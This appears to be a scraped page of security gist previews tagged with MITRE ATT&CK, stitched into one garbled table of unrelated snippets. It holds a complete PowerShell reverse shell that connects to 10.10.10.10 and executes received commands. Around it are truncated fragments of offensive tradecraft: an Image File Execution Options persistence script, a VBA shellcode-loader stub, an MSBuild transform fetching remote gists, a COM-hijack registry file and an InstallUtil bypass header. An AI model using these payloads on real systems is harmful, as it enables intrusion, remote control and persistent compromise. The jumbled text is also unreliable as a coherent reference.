MITRE ATT&CK - T1132 - Data Encoding
| Base64 Code | Decoded (. = 0x00) | Description | MITRE ID |
|---|---|---|---|
| JAB | $. | Variable declaration (UTF-16) | T1086 |
| TVq | MZ | MZ header | T1001 |
| UEs | PK | ZIP, Office documents | T1001 |
| SUVY | IEX | PowerShell Invoke Expression | T1086 |
| <# | |
| ImageFileExecutionOptions v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Image File Execution Options Injection Persistence Technique | |
| # https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ | |
| function Persist-Debugger |
| #!/bin/bash | |
| # Add a firewall NAT rule to expose a port open in a docker container, on a host. | |
| # | |
| # This is only really useful if the container is already running, and you don't | |
| # want to/can't shut it down, but need a new incoming port open. | |
| # | |
| # Requires `jq` for parsing docker container information. | |
| # | |
| # 2019 @leonjza |
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <string.h> | |
| /* | |
| $ gcc fbmon.c | |
| $ ./a.out | |
| *** stack smashing detected ***: <unknown> terminated | |
| Aborted (core dumped) |
| # Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html | |
| $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() |
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0"> | |
| <Target Name="Example"> | |
| <ItemGroup> | |
| <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" /> | |
| </ItemGroup> | |
| <PropertyGroup> | |
| <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile> | |
| </PropertyGroup> | |
| <XslTransformation | |
| OutputPaths="output.%(XmlFiles.FileName).html" |
| Windows Registry Editor Version 5.00 | |
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary] | |
| @="" | |
| [HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID] | |
| @="{00000001-0000-0000-0000-0000FEEDACDC}" | |
| [HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}] |
| /* | |
| _____ __ __ ___ __ | |
| / ___/__ ___/ / / |/ /__ ___/ /__ | |
| / (_ / _ \/ _ / / /|_/ / _ \/ _ / -_) | |
| \___/\___/\_,_/_/_/__/_/\___/\_,_/\__/ | |
| \ \/ / _ | / _ \/ _ | / _ \__ __/ /__ | |
| \ / __ |/ , _/ __ | / , _/ // / / -_) | |
| /_/_/ |_/_/|_/_/ |_| /_/|_|\_,_/_/\__/ | |
| Florian Roth - v0.1 May 2019 |
| using System; | |
| using System.Net; | |
| using System.Diagnostics; | |
| using System.Reflection; | |
| using System.Configuration.Install; | |
| using System.Runtime.InteropServices; | |
| /* | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |